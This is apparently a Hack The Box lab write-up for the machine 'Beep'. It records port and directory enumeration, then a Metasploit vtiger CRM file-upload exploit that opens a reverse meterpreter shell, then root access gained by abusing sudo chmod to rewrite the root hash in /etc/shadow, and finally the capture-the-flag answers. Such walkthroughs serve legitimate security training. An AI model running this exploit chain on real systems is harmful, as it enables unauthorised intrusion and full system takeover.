Beep
About
Beep has a very large list of running services, which can make it a bit challenging to find the correct entry method. This machine can be overwhelming for some as there are many potential attack vectors. Luckily, there are several methods available for gaining access.
Enumeration
Running the script portscan.sh reveals 7 attack vectors, SSH, SMTP, HTTP(S), POP3(S), RPC, IMAP(S) and MySQL.
┌──(m0nk3y@kali)-[~/HTB/Beep]
└─$ sudo portscan.sh 10.129.1.226
┌──(m0nk3y@kali)-[~/HTB/Beep]
└─$ cat PortScan\(10.129.1.226\)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://10.129.1.226/
|_http-server-header: Apache/2.2.3 (CentOS)
110/tcp open pop3?
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 938/udp status
|_ 100024 1 941/tcp status
143/tcp open imap?
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
| http-robots.txt: 1 disallowed entry
|_/
|_ssl-date: 2023-09-06T13:36:13+00:00; -3s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Elastix - Login page
941/tcp open status 1 (RPC #100024)
993/tcp open imaps?
995/tcp open pop3s?
3306/tcp open mysql?
4190/tcp open sieve?
4445/tcp open upnotifyp?
4559/tcp open hylafax?
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Host: 127.0.0.1
Host script results:
|_clock-skew: -3s
PORT STATE SERVICE VERSION
10000/udp open webmin (https on TCP port 10000)
Exploitation
HTTP
Running gobuster reveals large amount of directories, all of which needs to be checked for potential vulnerabilities.
┌──(m0nk3y@kali)-[~/HTB/Beep]
└─$ gobuster dir -u https://10.129.1.226 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -f -k -t 32
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://10.129.1.226
[+] Method: GET
[+] Threads: 32
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2023/09/06 09:48:20 Starting gobuster in directory enumeration mode
===============================================================
/help/ (Status: 200) [Size: 346]
/cgi-bin/ (Status: 403) [Size: 288]
/images/ (Status: 200) [Size: 29900]
/recordings/ (Status: 200) [Size: 5194]
/panel/ (Status: 200) [Size: 1065]
/static/ (Status: 200) [Size: 1278]
/themes/ (Status: 200) [Size: 3174]
/admin/ (Status: 302) [Size: 0] [--> config.php]
/icons/ (Status: 200) [Size: 31008]
/error/ (Status: 403) [Size: 286]
/pipermail/ (Status: 200) [Size: 700]
/mail/ (Status: 200) [Size: 2411]
/modules/ (Status: 200) [Size: 13134]
/lang/ (Status: 200) [Size: 4790]
/mailman/ (Status: 403) [Size: 288]
/vtigercrm/ (Status: 200) [Size: 6499]
/libs/ (Status: 200) [Size: 7800]
/var/ (Status: 200) [Size: 1238]
===============================================================
2023/09/06 10:29:32 Finished
===============================================================
By manually checking every pages found, I’m able to map each directory to their services as the following.
| URL | Service | Version |
|---|---|---|
| https://10.129.1.226/ | Elastix | Unknown |
| https://10.129.1.226/recordings/ | FreePBX | 2.5 |
| https://10.129.1.226/mail/ | RoundCube Webmail | Unknown |
| https://10.129.1.226/vtigercrm/ | vtiger CRM | 5.1.0 |
From these services, I’ll start by checking the service vtiger CRM since I already know its version and also because it’s known to have a lot of vulnerabilities.
Using searchsploit-prettify.py, I’m able to find vast number of exploits as expected. Although the version is a little different, I’ll start by testing the exploit vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasploit) since it doesn’t require authentication and the vulnerability might have existed in version 5.1.0.
┌──(m0nk3y@kali)-[~/HTB/Beep]
└─$ searchsploit-prettify.py 'vtiger CRM 5'
--------------------------------------------------------------------------------------------------------------------- -----------------------------------------------------
| Exploit Title | Path |
--------------------------------------------------------------------------------------------------------------------- -----------------------------------------------------
| vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusions | /usr/share/exploitdb/exploits/php/webapps/2508.txt |
| vTiger CRM 4.2 - SQL Injection | /usr/share/exploitdb/exploits/php/webapps/26586.txt |
| vTiger CRM 4.2 Leads Module - 'record' Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/26584.txt |
| vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/26585.txt |
| vTiger CRM 5.0.4 - Local File Inclusion | /usr/share/exploitdb/exploits/php/webapps/16280.py |
| vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities | /usr/share/exploitdb/exploits/php/webapps/32307.txt |
| vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/9450.txt |
| vTiger CRM 5.1.0 - Local File Inclusion | /usr/share/exploitdb/exploits/php/webapps/18770.txt |
| vTiger CRM 5.2 - 'onlyforuser' SQL Injection | /usr/share/exploitdb/exploits/php/webapps/36208.txt |
| vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (1) | /usr/share/exploitdb/exploits/php/webapps/36203.txt |
| vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (2) | /usr/share/exploitdb/exploits/php/webapps/36255.txt |
| vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities | /usr/share/exploitdb/exploits/php/webapps/36204.txt |
| vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion | /usr/share/exploitdb/exploits/php/webapps/35574.txt |
| vTiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/35577.txt |
| vTiger CRM 5.3.0 5.4.0 - (Authenticated) Remote Code Execution (Metasploit) | /usr/share/exploitdb/exploits/php/remote/29319.rb |
| vTiger CRM 5.4.0 - 'index.php?onlyforuser' SQL Injection | /usr/share/exploitdb/exploits/php/webapps/28409.txt |
| vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasploit) | /usr/share/exploitdb/exploits/php/remote/30787.rb |
| vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities | /usr/share/exploitdb/exploits/php/webapps/27279.txt |
| vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion | /usr/share/exploitdb/exploits/php/webapps/32213.txt |
| vTiger CRM 6.3.0 - (Authenticated) Remote Code Execution | /usr/share/exploitdb/exploits/php/webapps/38345.txt |
| Vtiger CRM 7.1.0 - Remote Code Execution | /usr/share/exploitdb/exploits/php/webapps/46065.py |
--------------------------------------------------------------------------------------------------------------------- -----------------------------------------------------
By executing the Metasploit module found, I’m able to gain a shell as the user asterisk.
┌──(m0nk3y@kali)-[~/HTB/Beep]
└─$ msfconsole -q -x 'use exploit/multi/http/vtiger_soap_upload; set RHOSTS 10.129.1.226; set RPORT 443; set SSL true; set TARGETURI /vtigercrm/; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
RHOSTS => 10.129.1.226
RPORT => 443
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
TARGETURI => /vtigercrm/
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Uploading payload...
[+] Upload successfully uploaded
[*] Executing payload...
[*] Sending stage (39927 bytes) to 10.129.1.226
[+] Deleted uzVAsrYyFZD.php
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.1.226:58482) at 2023-09-06 10:06:47 -0400
meterpreter > getuid
Server username: asterisk
Privilege Escalation
Checking for sudo rights for the user asterisk shows that I’m able to run chmod as root without a password.
sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
Using this privilege, I’ll make /etc/shadow world-writable and update the password for the user root to pwn.
sudo chmod 777 /etc/shadow
ex "+set nobackup nowritebackup" "+%s/^root:[^:]\+:/root:$(openssl passwd -salt root -1 pwn):/" -scwq /etc/shadow
Finally, by spawning a TTY shell and switching to the super user with the updated password, I’m able to gain a shell as the user root.
python -c 'import pty; pty.spawn("/bin/bash");'
bash-3.2$ su
su
Password: pwn
[root@beep vtigercrm]# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Post Exploitation
With the shell acquired, I’m able to read the flags user.txt and root.txt.
[root@beep vtigercrm]# cat /home/fanis/user.txt
cat /home/fanis/user.txt
31d5a8d52081dcf854e96e26fb05fb56
[root@beep vtigercrm]# cat /root/root.txt
cat /root/root.txt
b7784f01167430f75e873a3082cc5831